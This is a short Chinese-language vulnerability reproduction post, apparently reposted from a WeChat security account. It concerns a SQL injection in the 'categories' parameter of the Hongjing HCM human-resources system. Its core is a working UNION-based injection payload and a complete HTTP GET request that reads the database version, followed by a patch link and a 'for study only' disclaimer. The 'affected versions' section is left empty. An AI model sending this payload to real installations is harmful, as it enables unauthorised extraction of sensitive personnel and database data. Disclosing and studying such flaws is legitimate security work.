漏洞说明
宏景人力资源管理系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。
宏景人力资源管理系统 categories处存在SQL注入漏洞,攻击者可以从其中获取数据库敏感信息
影响版本
宏景人力资源管理系统漏洞复现
payload:
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hellohongjingHcm~27~2c~40~40version~2d~2d# 查询数据库版本
GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hellohongjingHcm~27~2c~40~40version~2d~2d HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Cookie: JSESSIONID=52DCEBA606B3C4C4CE3A409486307013Accept-Encoding: gzip, deflateConnection: close
修复建议
安装厂商发布的补丁:http://hjsoft.com.cn/
本文章仅用于学习交流,不得用于非法用途
文章来源: http://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486067&idx=1&sn=0ea1f8e6ea45f263ca65f70e72309aa0&chksm=c1f925c1f68eacd77099c933384d3a12fcd9117f4174c1f7467231ba36fb505d945e42dd22de#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh